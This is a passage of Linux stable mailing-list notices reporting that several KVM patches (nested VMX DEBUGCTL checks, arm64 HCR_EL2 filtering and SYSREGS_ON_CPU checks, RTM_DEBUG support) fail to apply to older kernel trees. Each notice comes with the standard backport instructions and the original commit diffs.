vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081224-earlobe-tilt-6881@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 303084ad12767db64c84ba8fcd0450aec38c8534
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081259-clutter-elusive-1a09@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 303084ad12767db64c84ba8fcd0450aec38c8534 Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz(a)kernel.org>
Date: Mon, 21 Jul 2025 11:19:50 +0100
Subject: [PATCH] KVM: arm64: Filter out HCR_EL2 bits when running in
hypervisor context
Most HCR_EL2 bits are not supposed to affect EL2 at all, but only
the guest. However, we gladly merge these bits with the host's
HCR_EL2 configuration, irrespective of entering L1 or L2.
This leads to some funky behaviour, such as L1 trying to inject
a virtual SError for L2, and getting a taste of its own medecine.
Not quite what the architecture anticipated.
In the end, the only bits that matter are those we have defined as
invariants, either because we've made them RESx (E2H, HCD...), or
that we actively refuse to merge because the mess with KVM's own
logic.
Use the sanitisation infrastructure to get the RES1 bits, and let
things rip in a safer way.
Fixes: 04ab519bb86df ("KVM: arm64: nv: Configure HCR_EL2 for FEAT_NV2")
Signed-off-by: Marc Zyngier <maz(a)kernel.org>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250721101955.535159-3-maz@kernel.org
Signed-off-by: Oliver Upton <oliver.upton(a)linux.dev>
diff --git a/arch/arm64/kvm/hyp/vhe/switch.c b/arch/arm64/kvm/hyp/vhe/switch.c
index 477f1580ffea..e482181c6632 100644
--- a/arch/arm64/kvm/hyp/vhe/switch.c
+++ b/arch/arm64/kvm/hyp/vhe/switch.c
@@ -48,8 +48,7 @@ DEFINE_PER_CPU(unsigned long, kvm_hyp_vector);
static u64 __compute_hcr(struct kvm_vcpu *vcpu)
{
- u64 guest_hcr = __vcpu_sys_reg(vcpu, HCR_EL2);
- u64 hcr = vcpu->arch.hcr_el2;
+ u64 guest_hcr, hcr = vcpu->arch.hcr_el2;
if (!vcpu_has_nv(vcpu))
return hcr;
@@ -68,10 +67,21 @@ static u64 __compute_hcr(struct kvm_vcpu *vcpu)
if (!vcpu_el2_e2h_is_set(vcpu))
hcr |= HCR_NV1;
+ /*
+ * Nothing in HCR_EL2 should impact running in hypervisor
+ * context, apart from bits we have defined as RESx (E2H,
+ * HCD and co), or that cannot be set directly (the EXCLUDE
+ * bits). Given that we OR the guest's view with the host's,
+ * we can use the 0 value as the starting point, and only
+ * use the config-driven RES1 bits.
+ */
+ guest_hcr = kvm_vcpu_apply_reg_masks(vcpu, HCR_EL2, 0);
+
write_sysreg_s(vcpu->arch.ctxt.vncr_array, SYS_VNCR_EL2);
} else {
host_data_clear_flag(VCPU_IN_HYP_CONTEXT);
+ guest_hcr = __vcpu_sys_reg(vcpu, HCR_EL2);
if (guest_hcr & HCR_NV) {
u64 va = __fix_to_virt(vncr_fixmap(smp_processor_id()));
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x 303084ad12767db64c84ba8fcd0450aec38c8534
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081258-convent-unscrew-2e57@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 303084ad12767db64c84ba8fcd0450aec38c8534 Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz(a)kernel.org>
Date: Mon, 21 Jul 2025 11:19:50 +0100
Subject: [PATCH] KVM: arm64: Filter out HCR_EL2 bits when running in
hypervisor context
Most HCR_EL2 bits are not supposed to affect EL2 at all, but only
the guest. However, we gladly merge these bits with the host's
HCR_EL2 configuration, irrespective of entering L1 or L2.
This leads to some funky behaviour, such as L1 trying to inject
a virtual SError for L2, and getting a taste of its own medecine.
Not quite what the architecture anticipated.
In the end, the only bits that matter are those we have defined as
invariants, either because we've made them RESx (E2H, HCD...), or
that we actively refuse to merge because the mess with KVM's own
logic.
Use the sanitisation infrastructure to get the RES1 bits, and let
things rip in a safer way.
Fixes: 04ab519bb86df ("KVM: arm64: nv: Configure HCR_EL2 for FEAT_NV2")
Signed-off-by: Marc Zyngier <maz(a)kernel.org>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250721101955.535159-3-maz@kernel.org
Signed-off-by: Oliver Upton <oliver.upton(a)linux.dev>
diff --git a/arch/arm64/kvm/hyp/vhe/switch.c b/arch/arm64/kvm/hyp/vhe/switch.c
index 477f1580ffea..e482181c6632 100644
--- a/arch/arm64/kvm/hyp/vhe/switch.c
+++ b/arch/arm64/kvm/hyp/vhe/switch.c
@@ -48,8 +48,7 @@ DEFINE_PER_CPU(unsigned long, kvm_hyp_vector);
static u64 __compute_hcr(struct kvm_vcpu *vcpu)
{
- u64 guest_hcr = __vcpu_sys_reg(vcpu, HCR_EL2);
- u64 hcr = vcpu->arch.hcr_el2;
+ u64 guest_hcr, hcr = vcpu->arch.hcr_el2;
if (!vcpu_has_nv(vcpu))
return hcr;
@@ -68,10 +67,21 @@ static u64 __compute_hcr(struct kvm_vcpu *vcpu)
if (!vcpu_el2_e2h_is_set(vcpu))
hcr |= HCR_NV1;
+ /*
+ * Nothing in HCR_EL2 should impact running in hypervisor
+ * context, apart from bits we have defined as RESx (E2H,
+ * HCD and co), or that cannot be set directly (the EXCLUDE
+ * bits). Given that we OR the guest's view with the host's,
+ * we can use the 0 value as the starting point, and only
+ * use the config-driven RES1 bits.
+ */
+ guest_hcr = kvm_vcpu_apply_reg_masks(vcpu, HCR_EL2, 0);
+
write_sysreg_s(vcpu->arch.ctxt.vncr_array, SYS_VNCR_EL2);
} else {
host_data_clear_flag(VCPU_IN_HYP_CONTEXT);
+ guest_hcr = __vcpu_sys_reg(vcpu, HCR_EL2);
if (guest_hcr & HCR_NV) {
u64 va = __fix_to_virt(vncr_fixmap(smp_processor_id()));
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x c6e35dff58d348c1a9489e9b3b62b3721e62631d
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081254-rejoicing-peroxide-4695@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c6e35dff58d348c1a9489e9b3b62b3721e62631d Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz(a)kernel.org>
Date: Sun, 20 Jul 2025 11:22:29 +0100
Subject: [PATCH] KVM: arm64: Check for SYSREGS_ON_CPU before accessing the CPU
state
Mark Brown reports that since we commit to making exceptions
visible without the vcpu being loaded, the external abort selftest
fails.
Upon investigation, it turns out that the code that makes registers
affected by an exception visible to the guest is completely broken
on VHE, as we don't check whether the system registers are loaded
on the CPU at this point. We managed to get away with this so far,
but that's obviously as bad as it gets,
Add the required checksm and document the absolute need to check
for the SYSREGS_ON_CPU flag before calling into any of the
__vcpu_write_sys_reg_to_cpu()__vcpu_read_sys_reg_from_cpu() helpers.
Reported-by: Mark Brown <broonie(a)kernel.org>
Signed-off-by: Marc Zyngier <maz(a)kernel.org>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/18535df8-e647-4643-af9a-bb780af03a70@sirena.org.uk
Link: https://lore.kernel.org/r/20250720102229.179114-1-maz@kernel.org
Signed-off-by: Oliver Upton <oliver.upton(a)linux.dev>
diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
index e54d29feb469..d373d555a69b 100644
--- a/arch/arm64/include/asm/kvm_host.h
+++ b/arch/arm64/include/asm/kvm_host.h
@@ -1169,6 +1169,8 @@ static inline bool __vcpu_read_sys_reg_from_cpu(int reg, u64 *val)
* System registers listed in the switch are not saved on every
* exit from the guest but are only saved on vcpu_put.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the guest cannot modify its
* own MPIDR_EL1 and MPIDR_EL1 is accessed for VCPU A from VCPU B's
@@ -1221,6 +1223,8 @@ static inline bool __vcpu_write_sys_reg_to_cpu(u64 val, int reg)
* System registers listed in the switch are not restored on every
* entry to the guest but are only restored on vcpu_load.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the MPIDR should only be set
* once, before running the VCPU, and never changed later.
diff --git a/arch/arm64/kvm/hyp/exception.c b/arch/arm64/kvm/hyp/exception.c
index 7dafd10e52e8..95d186e0bf54 100644
--- a/arch/arm64/kvm/hyp/exception.c
+++ b/arch/arm64/kvm/hyp/exception.c
@@ -26,7 +26,8 @@ static inline u64 __vcpu_read_sys_reg(const struct kvm_vcpu *vcpu, int reg)
if (unlikely(vcpu_has_nv(vcpu)))
return vcpu_read_sys_reg(vcpu, reg);
- else if (__vcpu_read_sys_reg_from_cpu(reg, &val))
+ else if (vcpu_get_flag(vcpu, SYSREGS_ON_CPU) &&
+ __vcpu_read_sys_reg_from_cpu(reg, &val))
return val;
return __vcpu_sys_reg(vcpu, reg);
@@ -36,7 +37,8 @@ static inline void __vcpu_write_sys_reg(struct kvm_vcpu *vcpu, u64 val, int reg)
{
if (unlikely(vcpu_has_nv(vcpu)))
vcpu_write_sys_reg(vcpu, val, reg);
- else if (!__vcpu_write_sys_reg_to_cpu(val, reg))
+ else if (!vcpu_get_flag(vcpu, SYSREGS_ON_CPU) ||
+ !__vcpu_write_sys_reg_to_cpu(val, reg))
__vcpu_assign_sys_reg(vcpu, reg, val);
}
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x c6e35dff58d348c1a9489e9b3b62b3721e62631d
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081253-shrunk-karate-ad70@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From c6e35dff58d348c1a9489e9b3b62b3721e62631d Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz(a)kernel.org>
Date: Sun, 20 Jul 2025 11:22:29 +0100
Subject: [PATCH] KVM: arm64: Check for SYSREGS_ON_CPU before accessing the CPU
state
Mark Brown reports that since we commit to making exceptions
visible without the vcpu being loaded, the external abort selftest
fails.
Upon investigation, it turns out that the code that makes registers
affected by an exception visible to the guest is completely broken
on VHE, as we don't check whether the system registers are loaded
on the CPU at this point. We managed to get away with this so far,
but that's obviously as bad as it gets,
Add the required checksm and document the absolute need to check
for the SYSREGS_ON_CPU flag before calling into any of the
__vcpu_write_sys_reg_to_cpu()__vcpu_read_sys_reg_from_cpu() helpers.
Reported-by: Mark Brown <broonie(a)kernel.org>
Signed-off-by: Marc Zyngier <maz(a)kernel.org>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/18535df8-e647-4643-af9a-bb780af03a70@sirena.org.uk
Link: https://lore.kernel.org/r/20250720102229.179114-1-maz@kernel.org
Signed-off-by: Oliver Upton <oliver.upton(a)linux.dev>
diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
index e54d29feb469..d373d555a69b 100644
--- a/arch/arm64/include/asm/kvm_host.h
+++ b/arch/arm64/include/asm/kvm_host.h
@@ -1169,6 +1169,8 @@ static inline bool __vcpu_read_sys_reg_from_cpu(int reg, u64 *val)
* System registers listed in the switch are not saved on every
* exit from the guest but are only saved on vcpu_put.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the guest cannot modify its
* own MPIDR_EL1 and MPIDR_EL1 is accessed for VCPU A from VCPU B's
@@ -1221,6 +1223,8 @@ static inline bool __vcpu_write_sys_reg_to_cpu(u64 val, int reg)
* System registers listed in the switch are not restored on every
* entry to the guest but are only restored on vcpu_load.
*
+ * SYSREGS_ON_CPU *MUST* be checked before using this helper.
+ *
* Note that MPIDR_EL1 for the guest is set by KVM via VMPIDR_EL2 but
* should never be listed below, because the MPIDR should only be set
* once, before running the VCPU, and never changed later.
diff --git a/arch/arm64/kvm/hyp/exception.c b/arch/arm64/kvm/hyp/exception.c
index 7dafd10e52e8..95d186e0bf54 100644
--- a/arch/arm64/kvm/hyp/exception.c
+++ b/arch/arm64/kvm/hyp/exception.c
@@ -26,7 +26,8 @@ static inline u64 __vcpu_read_sys_reg(const struct kvm_vcpu *vcpu, int reg)
if (unlikely(vcpu_has_nv(vcpu)))
return vcpu_read_sys_reg(vcpu, reg);
- else if (__vcpu_read_sys_reg_from_cpu(reg, &val))
+ else if (vcpu_get_flag(vcpu, SYSREGS_ON_CPU) &&
+ __vcpu_read_sys_reg_from_cpu(reg, &val))
return val;
return __vcpu_sys_reg(vcpu, reg);
@@ -36,7 +37,8 @@ static inline void __vcpu_write_sys_reg(struct kvm_vcpu *vcpu, u64 val, int reg)
{
if (unlikely(vcpu_has_nv(vcpu)))
vcpu_write_sys_reg(vcpu, val, reg);
- else if (!__vcpu_write_sys_reg_to_cpu(val, reg))
+ else if (!vcpu_get_flag(vcpu, SYSREGS_ON_CPU) ||
+ !__vcpu_write_sys_reg_to_cpu(val, reg))
__vcpu_assign_sys_reg(vcpu, reg, val);
}
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081206-eclipse-preview-8baf@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081205-resurface-filler-e78b@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
